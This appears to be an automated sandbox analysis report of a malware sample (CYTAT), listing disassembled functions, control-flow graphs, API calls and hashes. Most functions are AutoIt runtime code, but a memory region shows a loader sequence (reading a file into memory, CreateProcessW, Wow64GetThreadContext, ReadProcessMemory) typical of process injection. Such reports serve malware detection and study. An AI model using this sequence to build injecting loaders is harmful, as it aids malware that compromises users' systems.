                                                control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                APIs
                                                • _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • std::exception::exception.LIBCMT ref: 00411626
                                                • std::exception::exception.LIBCMT ref: 00411640
                                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                • String ID: ,*H$4*H$@fI
                                                • API String ID: 615853336-1459471987
                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                Function 03FC1730 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2065 3fc1730-3fc17de call 3fbf140 2068 3fc17e5-3fc180b call 3fc2640 CreateFileW 2065->2068 2071 3fc180d 2068->2071 2072 3fc1812-3fc1822 2068->2072 2073 3fc195d-3fc1961 2071->2073 2077 3fc1829-3fc1843 VirtualAlloc 2072->2077 2078 3fc1824 2072->2078 2074 3fc19a3-3fc19a6 2073->2074 2075 3fc1963-3fc1967 2073->2075 2079 3fc19a9-3fc19b0 2074->2079 2080 3fc1969-3fc196c 2075->2080 2081 3fc1973-3fc1977 2075->2081 2082 3fc184a-3fc1861 ReadFile 2077->2082 2083 3fc1845 2077->2083 2078->2073 2084 3fc1a05-3fc1a1a 2079->2084 2085 3fc19b2-3fc19bd 2079->2085 2080->2081 2086 3fc1979-3fc1983 2081->2086 2087 3fc1987-3fc198b 2081->2087 2090 3fc1868-3fc18a8 VirtualAlloc 2082->2090 2091 3fc1863 2082->2091 2083->2073 2094 3fc1a1c-3fc1a27 VirtualFree 2084->2094 2095 3fc1a2a-3fc1a32 2084->2095 2092 3fc19bf 2085->2092 2093 3fc19c1-3fc19cd 2085->2093 2086->2087 2088 3fc198d-3fc1997 2087->2088 2089 3fc199b 2087->2089 2088->2089 2089->2074 2096 3fc18af-3fc18ca call 3fc2890 2090->2096 2097 3fc18aa 2090->2097 2091->2073 2092->2084 2098 3fc19cf-3fc19df 2093->2098 2099 3fc19e1-3fc19ed 2093->2099 2094->2095 2105 3fc18d5-3fc18df 2096->2105 2097->2073 2101 3fc1a03 2098->2101 2102 3fc19ef-3fc19f8 2099->2102 2103 3fc19fa-3fc1a00 2099->2103 2101->2079 2102->2101 2103->2101 2106 3fc18e1-3fc1910 call 3fc2890 2105->2106 2107 3fc1912-3fc1926 call 3fc26a0 2105->2107 2106->2105 2112 3fc1928 2107->2112 2113 3fc192a-3fc192e 2107->2113 2112->2073 2115 3fc193a-3fc193e 2113->2115 2116 3fc1930-3fc1934 CloseHandle 2113->2116 2117 3fc194e-3fc1957 2115->2117 2118 3fc1940-3fc194b VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03FC1801
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03FC1A27
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                • Instruction ID: 6dbf15755da0954f35bf0227b6663a30ad66d8cb1995308eade8f6221c9a52dd
                                                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                • Instruction Fuzzy Hash: 94A12774E5024AEBDB14CFA4CA94BEEF7B5FF48304F208599E106BB281C7759A90CB54
                                                Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2119 401250-40125c 2120 401262-401293 call 412f40 call 401b80 2119->2120 2121 4012e8-4012ed 2119->2121 2126 4012d1-4012e2 KillTimer SetTimer 2120->2126 2127 401295-4012b5 2120->2127 2126->2121 2128 4012bb-4012bf 2127->2128 2129 4272ec-4272f2 2127->2129 2130 4012c5-4012cb 2128->2130 2131 42733f-427346 2128->2131 2132 4272f4-427315 Shell_NotifyIconW 2129->2132 2133 42731a-42733a Shell_NotifyIconW 2129->2133 2130->2126 2134 427393-4273b4 Shell_NotifyIconW 2130->2134 2135 427348-427369 Shell_NotifyIconW 2131->2135 2136 42736e-42738e Shell_NotifyIconW 2131->2136 2132->2126 2133->2126 2134->2126 2135->2126 2136->2126
                                                APIs
                                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 3300667738-0
                                                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                • API String ID: 1586453840-614718249
                                                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                Function 03FC14F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 03FC13E0: Sleep.KERNELBASE(000001F4), ref: 03FC13F1
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03FC161A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: 5MBHF9X5HTW0MNM00OA0R5GPL
                                                • API String ID: 2694422964-1523133119
                                                • Opcode ID: 74e18d75c01c1c7f24549686e3bc5a9f1c06aa198d0bb39b8b15985597893119
                                                • Instruction ID: bc992003ee76e5672912920a0d3e018b787c2604872de3434d5158658c5612ad
                                                • Opcode Fuzzy Hash: 74e18d75c01c1c7f24549686e3bc5a9f1c06aa198d0bb39b8b15985597893119
                                                • Instruction Fuzzy Hash: A951A230D14389DAEF11DBB4C954BDEBBB8AF15304F044199E6487B2C1C6B94B48CBA5
                                                Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcsncpy.LIBCMT ref: 00401C41
                                                • _wcscpy.LIBCMT ref: 00401C5D
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                • String ID: Line:
                                                • API String ID: 1874344091-1585850449
                                                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Close$OpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 1607946009-824357125
                                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                Download Yara Rule
                                                APIs
                                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                • _wcsncpy.LIBCMT ref: 004102ED
                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                • _wcsncpy.LIBCMT ref: 00410340
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                • String ID:
                                                • API String ID: 3170942423-0
                                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                Function 03FC03E0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03FC0B9B
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FC0C31
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FC0C53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                • Instruction ID: 077f49a7afd7454db156fc53da0a7024c6e2b52049511530bbf90cb0b57d0719
                                                • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                • Instruction Fuzzy Hash: 16620E30A64259DBEB24CFA4C950BDEB376EF58300F1091A9D10DEB390EB759E81CB59
                                                Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: Error:
                                                • API String ID: 4104443479-232661952
                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                • String ID: X$pWH
                                                • API String ID: 85490731-941433119
                                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
